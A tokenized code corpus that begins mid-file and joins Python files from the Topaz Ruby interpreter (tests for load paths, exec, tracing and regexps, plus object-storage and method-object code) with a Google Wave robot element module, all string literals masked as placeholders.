int_w ( w_res ) == <NUM_LIT:3> <EOL> def test_no_ext_on_path ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % f ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:5> <EOL> def test_null_bytes ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_load_path_element_coerce ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> w_res = space . execute ( """<STR_LIT>""" % tmpdir ) <EOL> assert w_res is space . w_true <EOL> def test_path_ambigious_directory_file ( self , space , tmpdir ) : <EOL> f = tmpdir . join ( "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" ) <EOL> tmpdir . join ( "<STR_LIT:t>" ) . ensure ( dir = True ) <EOL> w_res = space . execute ( """<STR_LIT>""" % ( tmpdir , tmpdir . join ( "<STR_LIT:t>" ) ) ) <EOL> assert w_res is space . w_true <EOL> class TestExec ( BaseTopazTest ) : <EOL> def fork_and_wait ( self , space , capfd , code ) : <EOL> cpid = os . fork ( ) <EOL> if cpid == <NUM_LIT:0> : <EOL> try : <EOL> space . execute ( code ) <EOL> finally : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> else : <EOL> os . waitpid ( cpid , <NUM_LIT:0> ) <EOL> out , err = capfd . readouterr ( ) <EOL> return out <EOL> def test_exec_with_sh ( self , space , capfd ) : <EOL> out = self . fork_and_wait ( space , capfd , "<STR_LIT>" ) <EOL> assert out == "<STR_LIT>" <EOL> def test_exec_directly ( self , space , capfd ) : <EOL> out = self . fork_and_wait ( space , capfd , "<STR_LIT>" ) <EOL> assert out == "<STR_LIT>" <EOL> def test_exec_with_custom_argv0 ( self , space , capfd ) : <EOL> out = self . fork_and_wait ( space , capfd , "<STR_LIT>" ) <EOL> assert out == "<STR_LIT>" <EOL> @ pytest . mark . xfail <EOL> def test_exec_with_path_search ( self , space , capfd ) : <EOL> out = self . fork_and_wait ( space , capfd , "<STR_LIT>" ) <EOL> assert out == "<STR_LIT>" <EOL> def test_exec_with_null_bytes ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( '<STR_LIT>' ) <EOL> class TestSetTraceFunc ( BaseTopazTest ) : <EOL> def test_class ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ <EOL> [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:3> , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:7> , None , None ] , <EOL> [ "<STR_LIT:class>" , "<STR_LIT>" , <NUM_LIT:7> , None , None ] , <EOL> [ "<STR_LIT:end>" , "<STR_LIT>" , <NUM_LIT:7> , None , None ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:10> , None , None ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:10> , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ] </s>
<s> from . . base import BaseTopazTest <EOL> class TestRegexpObject ( BaseTopazTest ) : <EOL> def test_source ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT:abc>" <EOL> def test_compile_regexps ( self , space ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_regexp_syntax_errors ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_regexp_compile_errors ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_regexp_new_errors ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( """<STR_LIT>""" ) <EOL> def test_to_s ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT>" <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT>" <EOL> def test_match_operator ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ <NUM_LIT:2> , "<STR_LIT:l>" , "<STR_LIT:l>" , "<STR_LIT:o>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" , "<STR_LIT:h>" , "<STR_LIT:e>" , "<STR_LIT:l>" , "<STR_LIT>" , "<STR_LIT:l>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def test_match_method ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:1> <EOL> def test_match_begin ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:1> <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:2> <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:4> <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_match_end ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:7> <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:6> <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:6> <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_new_regexp ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_true <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT:abc>" <EOL> def test_allocate ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> with self . raises ( space , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_size ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:4> <EOL> def test_set_match_data_wrong_type ( self , space ) : <EOL> with self . raises ( space , "<STR_LIT>" ) : <EOL> space . execute ( "<STR_LIT>" ) <EOL> space . execute ( "<STR_LIT>" ) <EOL> def test_atomic_grouping ( self , space ) : <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert w_res is space . w_nil <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" ] <EOL> def test_set_intersection ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:3> <EOL> def test_to_a ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT:abc>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] <EOL> def test_values_at ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" , "<STR_LIT:X>" , "<STR_LIT>" ] <EOL> def test_branch ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> def test_dot ( self , space ) : <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert w_res is space . w_nil <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> def test_non_capturing_group ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" , "<STR_LIT:bar>" ] <EOL> def test_optional_group ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == "<STR_LIT:foo>" <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == "<STR_LIT:bar>" <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) is None <EOL> def test_quantify_set ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:2> <EOL> def test_posix_class ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:3> <EOL> def test_quantify ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" ] <EOL> def test_repeated_quantification ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def test_casefoldp ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_false <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_true <EOL> def test_eqeqeq ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_true <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_false <EOL> def test_escape ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT>" <EOL> def test_ignore_whitespace ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> </s>
<s> from rpython . rlib import jit , longlong2float <EOL> from rpython . rlib . objectmodel import specialize <EOL> from rpython . rlib . rarithmetic import intmask <EOL> from rpython . rlib . unroll import unrolling_iterable <EOL> from rpython . rtyper . lltypesystem import rffi , lltype <EOL> NUM_DIGITS = <NUM_LIT:4> <EOL> NUM_DIGITS_POW2 = <NUM_LIT:1> << NUM_DIGITS <EOL> class MapTransitionCache ( object ) : <EOL> def __init__ ( self , space ) : <EOL> self . class_nodes = { } <EOL> self . transitions = { } <EOL> @ jit . elidable <EOL> def get_class_node ( self , w_cls ) : <EOL> return self . class_nodes . setdefault ( w_cls , ClassNode ( w_cls ) ) <EOL> @ jit . elidable <EOL> def get_transition ( self , prev , node_cls , name ) : <EOL> return self . transitions . setdefault ( ( prev , node_cls , name ) , node_cls ( prev , name ) ) <EOL> class BaseNode ( object ) : <EOL> _attrs_ = [ "<STR_LIT>" ] <EOL> _immutable_fields_ = [ "<STR_LIT>" ] <EOL> @ jit . elidable <EOL> def find ( self , node_cls , name = None ) : <EOL> node = self <EOL> while node is not None : <EOL> if node . matches ( node_cls , name ) : <EOL> return node <EOL> node = node . getprev ( ) <EOL> def matches ( self , node_cls , name ) : <EOL> return isinstance ( self , node_cls ) <EOL> def add ( self , space , node_cls , name , w_obj ) : <EOL> new_node = space . fromcache ( MapTransitionCache ) . get_transition ( self , node_cls , name ) <EOL> new_node . update_storage_size ( w_obj , self ) <EOL> return new_node <EOL> class ClassNode ( BaseNode ) : <EOL> _immutable_fields_ = [ "<STR_LIT>" ] <EOL> uses_object_storage = uses_unboxed_storage = False <EOL> def __init__ ( self , w_cls ) : <EOL> self . w_cls = w_cls <EOL> self . size_estimate = SizeEstimate ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def getclass ( self ) : <EOL> return self . w_cls <EOL> def change_class ( self , space , new_cls ) : <EOL> return space . fromcache ( MapTransitionCache ) . get_class_node ( new_cls ) <EOL> def copy_attrs ( self , space , w_obj , w_target ) : <EOL> pass <EOL> def getprev ( self ) : <EOL> return None <EOL> class StorageNode ( BaseNode ) : <EOL> _immutable_fields_ = [ "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" ] <EOL> def __init__ ( self , prev , name ) : <EOL> self . prev = prev <EOL> self . name = name <EOL> self . pos = self . compute_position ( ) <EOL> def length ( self ) : <EOL> return self . pos + <NUM_LIT:1> <EOL> def getprev ( self ) : <EOL> return self . prev <EOL> def change_class ( self , space , w_cls ) : <EOL> new_prev = self . prev . change_class ( space , w_cls ) <EOL> return space . fromcache ( MapTransitionCache ) . get_transition ( new_prev , self . __class__ , self . name ) <EOL> def matches ( self , node_cls , name ) : <EOL> return BaseNode . matches ( self , node_cls , name ) and name == self . name <EOL> def update_storage_size ( self , w_obj , prev_node ) : <EOL> if not jit . we_are_jitted ( ) : <EOL> prev_node . size_estimate . update_from ( self . size_estimate ) <EOL> class AttributeNode ( StorageNode ) : <EOL> @ staticmethod <EOL> def select_type ( space , w_value ) : <EOL> for cls in ATTRIBUTE_CLASSES : <EOL> if cls . correct_type ( space , w_value ) : <EOL> return cls <EOL> def copy_attrs ( self , space , w_obj , w_target ) : <EOL> self . prev . copy_attrs ( space , w_obj , w_target ) <EOL> w_target . set_instance_var ( space , self . name , self . read ( space , w_obj ) ) <EOL> def write ( self , space , w_obj , w_value ) : <EOL> if not self . correct_type ( space , w_value ) : <EOL> w_obj . map = w_obj . map . remove_attr ( space , self , w_obj ) <EOL> w_obj . map = node = w_obj . map . add ( space , AttributeNode . select_type ( space , w_value ) , self . name , w_obj ) <EOL> node . write ( space , w_obj , w_value ) <EOL> else : <EOL> self . _store ( space , w_obj , w_value ) <EOL> def remove_attr ( self , space , node , w_obj ) : <EOL> if node is self : <EOL> return self . prev <EOL> w_cur_val = self . read ( space , w_obj ) <EOL> new_prev = self . prev . remove_attr ( space , node , w_obj ) <EOL> node = new_prev . add ( space , AttributeNode . select_type ( space , w_cur_val ) , self . name , w_obj ) <EOL> node . write ( space , w_obj , w_cur_val ) <EOL> return node <EOL> class UnboxedAttributeNode ( AttributeNode ) : <EOL> uses_object_storage = False <EOL> uses_unboxed_storage = True <EOL> def __init__ ( self , prev , name ) : <EOL> AttributeNode . __init__ ( self , prev , name ) <EOL> self . size_estimate = SizeEstimate ( <EOL> prev . size_estimate . _object_size_estimate , <EOL> self . length ( ) * NUM_DIGITS_POW2 <EOL> ) <EOL> def compute_position ( self ) : <EOL> return compute_position ( self , "<STR_LIT>" ) <EOL> def update_storage_size ( self , w_obj , prev_node ) : <EOL> AttributeNode . update_storage_size ( self , w_obj , prev_node ) <EOL> update_storage ( self , w_obj , "<STR_LIT>" , <NUM_LIT:0.0> ) <EOL> class IntAttributeNode ( UnboxedAttributeNode ) : <EOL> @ staticmethod <EOL> def correct_type ( space , w_value ) : <EOL> return space . is_kind_of ( w_value , space . w_fixnum ) <EOL> def _store ( self , space , w_obj , w_value ) : <EOL> w_obj . unboxed_storage [ self . pos ] = longlong2float . longlong2float ( rffi . cast ( lltype . SignedLongLong , space . int_w ( w_value ) ) ) <EOL> def read ( self , space , w_obj ) : <EOL> return space . newint ( intmask ( longlong2float . float2longlong ( w_obj . unboxed_storage [ self . pos ] ) ) ) <EOL> class FloatAttributeNode ( UnboxedAttributeNode ) : <EOL> @ staticmethod <EOL> def correct_type ( space , w_value ) : <EOL> return space . is_kind_of ( w_value , space . w_float ) <EOL> def _store ( self , space , w_obj , w_value ) : <EOL> w_obj . unboxed_storage [ self . pos ] = space . float_w ( w_value ) <EOL> def read ( self , space , w_obj ) : <EOL> return space . newfloat ( w_obj . unboxed_storage [ self . pos ] ) <EOL> class ObjectAttributeNode ( AttributeNode ) : <EOL> uses_object_storage = True <EOL> uses_unboxed_storage = False <EOL> def __init__ ( self , prev , name ) : <EOL> AttributeNode . __init__ ( self , prev , name ) <EOL> self . size_estimate = SizeEstimate ( <EOL> self . length ( ) * NUM_DIGITS_POW2 , <EOL> prev . size_estimate . _unboxed_size_estimate , <EOL> ) <EOL> @ staticmethod <EOL> def correct_type ( space , w_value ) : <EOL> return True <EOL> def compute_position ( self ) : <EOL> return compute_position ( self , "<STR_LIT>" ) <EOL> def update_storage_size ( self , w_obj , prev_node ) : <EOL> AttributeNode . update_storage_size ( self , w_obj , prev_node ) <EOL> update_storage ( self , w_obj , "<STR_LIT:object>" , None ) <EOL> def _store ( self , space , w_obj , w_value ) : <EOL> w_obj . object_storage [ self . pos ] = w_value <EOL> def read ( self , space , w_obj ) : <EOL> return w_obj . object_storage [ self . pos ] <EOL> class FlagNode ( StorageNode ) : <EOL> uses_object_storage = True <EOL> uses_unboxed_storage = False <EOL> def __init__ ( self , prev , name ) : <EOL> StorageNode . __init__ ( self , prev , name ) <EOL> self . size_estimate = SizeEstimate ( <EOL> self . length ( ) * NUM_DIGITS_POW2 , <EOL> prev . size_estimate . _unboxed_size_estimate , <EOL> ) <EOL> def compute_position ( self ) : <EOL> return compute_position ( self , "<STR_LIT>" ) <EOL> def update_storage_size ( self , w_obj , prev_node ) : <EOL> StorageNode . update_storage_size ( self , w_obj , prev_node ) <EOL> update_storage ( self , w_obj , "<STR_LIT:object>" , None ) <EOL> def copy_attrs ( self , space , w_obj , w_target ) : <EOL> self . prev . copy_attrs ( space , w_obj , w_target ) <EOL> def write ( self , space , w_obj , w_value ) : <EOL> w_obj . object_storage [ self . pos ] = w_value <EOL> def read ( self , space , w_obj ) : <EOL> return w_obj . object_storage [ self . pos ] <EOL> ATTRIBUTE_CLASSES = unrolling_iterable ( [ <EOL> IntAttributeNode , <EOL> FloatAttributeNode , <EOL> ObjectAttributeNode , <EOL> ] ) <EOL> @ specialize . arg ( <NUM_LIT:2> ) <EOL> @ jit . unroll_safe <EOL> def update_storage ( node , w_obj , storage_name , empty_value ) : <EOL> storage = getattr ( w_obj , storage_name + "<STR_LIT>" ) <EOL> if storage is None or node . length ( ) >= len ( storage ) : <EOL> new_storage = [ empty_value ] * getattr ( node . size_estimate , storage_name + "<STR_LIT>" ) ( ) <EOL> if storage is not None : <EOL> for i , value in enumerate ( storage ) : <EOL> new_storage [ i ] = value <EOL> setattr ( w_obj , storage_name + "<STR_LIT>" , new_storage ) <EOL> @ specialize . arg ( <NUM_LIT:1> ) <EOL> def compute_position ( node , predicate ) : <EOL> node = node . getprev ( ) <EOL> n = <NUM_LIT:0> <EOL> while node is not None : <EOL> if getattr ( node , predicate ) : <EOL> n += <NUM_LIT:1> <EOL> node = node . getprev ( ) <EOL> return n <EOL> class SizeEstimate ( object ) : <EOL> def __init__ ( self , object_size_estimate , unboxed_size_estimate ) : <EOL> self . _object_size_estimate = object_size_estimate <EOL> self . _unboxed_size_estimate = unboxed_size_estimate <EOL> @ jit . elidable <EOL> def object_size_estimate ( self ) : <EOL> return self . _object_size_estimate >> NUM_DIGITS <EOL> @ jit . elidable <EOL> def unboxed_size_estimate ( self ) : <EOL> return self . _unboxed_size_estimate >> NUM_DIGITS <EOL> def update_from ( self , other ) : <EOL> self . _object_size_estimate = self . _object_size_estimate + other . object_size_estimate ( ) - self . object_size_estimate ( ) <EOL> self . _unboxed_size_estimate = self . _unboxed_size_estimate + other . unboxed_size_estimate ( ) - self . unboxed_size_estimate ( ) </s>
<s> from topaz . module import ClassDef <EOL> from topaz . objects . objectobject import W_Object <EOL> def create_owner ( classdef ) : <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_owner ( self , space ) : <EOL> return self . w_owner <EOL> return method_owner <EOL> def create_to_s ( classdef ) : <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_to_s ( self , space ) : <EOL> return space . newstr_fromstr ( <EOL> "<STR_LIT>" % ( classdef . name , self . w_owner . name , self . w_function . name ) <EOL> ) <EOL> return method_to_s <EOL> class W_MethodObject ( W_Object ) : <EOL> classdef = ClassDef ( "<STR_LIT>" , W_Object . classdef ) <EOL> def __init__ ( self , space , w_owner , w_function , w_receiver ) : <EOL> W_Object . __init__ ( self , space ) <EOL> self . w_owner = w_owner <EOL> self . w_function = w_function <EOL> self . w_receiver = w_receiver <EOL> method_allocate = classdef . undefine_allocator ( ) <EOL> method_owner = create_owner ( classdef ) <EOL> method_to_s = create_to_s ( classdef ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_call ( self , space , args_w , block ) : <EOL> return space . invoke_function ( <EOL> self . w_function , <EOL> self . w_receiver , <EOL> args_w , <EOL> block <EOL> ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_unbind ( self , space ) : <EOL> return W_UnboundMethodObject ( space , self . w_owner , self . w_function ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_receiver ( self , space ) : <EOL> return self . w_receiver <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_eql ( self , space , w_other ) : <EOL> if isinstance ( w_other , W_MethodObject ) : <EOL> return space . newbool ( <EOL> self . w_function is w_other . w_function and self . w_receiver is w_other . w_receiver <EOL> ) <EOL> else : <EOL> return space . w_false <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_arity ( self , space ) : <EOL> return self . w_function . arity ( space ) <EOL> class W_UnboundMethodObject ( W_Object ) : <EOL> classdef = ClassDef ( "<STR_LIT>" , W_Object . classdef ) <EOL> def __init__ ( self , space , w_owner , w_function ) : <EOL> W_Object . __init__ ( self , space ) <EOL> self . w_owner = w_owner <EOL> self . w_function = w_function <EOL> method_allocator = classdef . undefine_allocator ( ) <EOL> method_owner = create_owner ( classdef ) <EOL> method_to_s = create_to_s ( classdef ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_bind ( self , space , w_receiver ) : <EOL> if not self . w_owner . is_ancestor_of ( space . getclass ( w_receiver ) ) : <EOL> raise space . error ( space . w_TypeError , <EOL> "<STR_LIT>" % self . w_owner . name <EOL> ) <EOL> else : <EOL> return W_MethodObject ( space , self . w_owner , self . w_function , w_receiver ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_eql ( self , space , w_other ) : <EOL> if isinstance ( w_other , W_UnboundMethodObject ) : <EOL> return space . newbool ( self . w_function is w_other . w_function ) <EOL> else : <EOL> return space . w_false <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_arity ( self , space ) : <EOL> return self . w_function . arity ( space ) </s>
<s> from rpython . rtyper . lltypesystem import rffi <EOL> def make_string_packer ( padding = "<STR_LIT:U+0020>" , nullterminated = False ) : <EOL> def pack_string ( space , packer , width ) : <EOL> try : <EOL> w_s = packer . args_w [ packer . args_index ] <EOL> except IndexError : <EOL> raise space . error ( space . w_ArgumentError , "<STR_LIT>" ) <EOL> string = space . str_w ( space . convert_type ( w_s , space . w_string , "<STR_LIT>" ) ) <EOL> if nullterminated : <EOL> packer . result += string <EOL> packer . result . append ( "<STR_LIT>" ) <EOL> else : <EOL> assert width >= <NUM_LIT:0> <EOL> string = string [ : width ] <EOL> packer . result += string <EOL> packer . result . extend ( [ padding ] * ( width - len ( string ) ) ) <EOL> packer . args_index += <NUM_LIT:1> <EOL> return pack_string <EOL> def pack_pointer ( space , packer , repetitions ) : <EOL> if repetitions > len ( packer . args_w ) - packer . args_index : <EOL> raise space . error ( space . w_ArgumentError , "<STR_LIT>" ) <EOL> for i in xrange ( repetitions ) : <EOL> for i in xrange ( packer . args_index , repetitions + packer . args_index ) : <EOL> packer . result . extend ( [ "<STR_LIT>" ] * rffi . sizeof ( rffi . INTPTR_T ) ) <EOL> packer . args_index += repetitions </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import logging <EOL> import util <EOL> class Range ( object ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , start = <NUM_LIT:0> , end = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . start = start <EOL> self . end = end <EOL> if self . end - self . start < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + str ( self . start ) + '<STR_LIT:U+002CU+0020>' + str ( self . end ) + '<STR_LIT:)>' <EOL> def IsCollapsed ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . end == self . start <EOL> class Annotation ( object ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , name , value , r = None ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . value = value <EOL> self . range = r or Range ( ) <EOL> ELEMENT_TYPE = util . StringEnum ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Element ( object ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , element_type , ** properties ) : <EOL> """<STR_LIT>""" <EOL> if len ( properties ) == <NUM_LIT:1> and '<STR_LIT>' in properties : <EOL> properties = properties [ '<STR_LIT>' ] <EOL> self . type = element_type <EOL> for key , val in properties . items ( ) : <EOL> setattr ( self , key , val ) <EOL> def Serialize ( self ) : <EOL> """<STR_LIT>""" <EOL> props = { } <EOL> data = { } <EOL> for attr in dir ( self ) : <EOL> if attr . startswith ( '<STR_LIT:_>' ) : <EOL> continue <EOL> val = getattr ( self , attr ) <EOL> if val is None or callable ( val ) : <EOL> continue <EOL> val = util . Serialize ( val ) <EOL> if attr == '<STR_LIT:type>' or attr == '<STR_LIT>' : <EOL> data [ attr ] = val <EOL> else : <EOL> props [ attr ] = val <EOL> data [ '<STR_LIT>' ] = util . Serialize ( props ) <EOL> return data <EOL> class FormElement ( Element ) : <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , element_type , name , value = '<STR_LIT>' , default_value = '<STR_LIT>' , label = '<STR_LIT>' ) : <EOL> super ( FormElement , self ) . __init__ ( element_type , <EOL> name = name , value = value , default_value = default_value , label = label ) <EOL> class Gadget ( Element ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , url = '<STR_LIT>' , props = None ) : <EOL> if props is None : <EOL> props = { } <EOL> props [ '<STR_LIT:url>' ] = url <EOL> logging . info ( '<STR_LIT>' + str ( props ) ) <EOL> super ( Gadget , self ) . __init__ ( ELEMENT_TYPE . GADGET , properties = props ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , key ) : <EOL> return getattr ( self , key ) <EOL> else : <EOL> return default <EOL> def SubmitDelta ( self , delta ) : <EOL> """<STR_LIT>""" <EOL> for k , v in delta . items ( ) : <EOL> setattr ( self , k , v ) <EOL> class Image ( Element ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , url = '<STR_LIT>' , width = None , height = None , <EOL> attachment_id = None , caption = None ) : <EOL> super ( Image , self ) . __init__ ( ELEMENT_TYPE . IMAGE , url = url , width = width , <EOL> height = height , attachment_id = attachment_id , caption = caption ) <EOL> def ElementFromJson ( json ) : <EOL> """<STR_LIT>""" <EOL> etype = json [ '<STR_LIT:type>' ] <EOL> logging . info ( '<STR_LIT>' + str ( json ) ) <EOL> props = json [ '<STR_LIT>' ] . copy ( ) <EOL> if etype == ELEMENT_TYPE . GADGET : <EOL> url = props [ '<STR_LIT:url>' ] <EOL> del props [ '<STR_LIT:url>' ] <EOL> return Gadget ( url = url , props = props ) <EOL> elif etype == ELEMENT_TYPE . IMAGE : <EOL> return Image ( url = props . get ( '<STR_LIT:url>' , '<STR_LIT>' ) , <EOL> width = props . get ( '<STR_LIT:width>' ) , <EOL> height = props . get ( '<STR_LIT>' ) , <EOL> attachment_id = props . get ( '<STR_LIT>' ) , <EOL> caption = props . get ( '<STR_LIT>' ) ) <EOL> return FormElement ( element_type = etype , <EOL> name = props . get ( '<STR_LIT:name>' , '<STR_LIT>' ) , <EOL> value = props . get ( '<STR_LIT:value>' , '<STR_LIT>' ) , <EOL> default_value = props . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> label = props . get ( '<STR_LIT:label>' , '<STR_LIT>' ) ) </s>
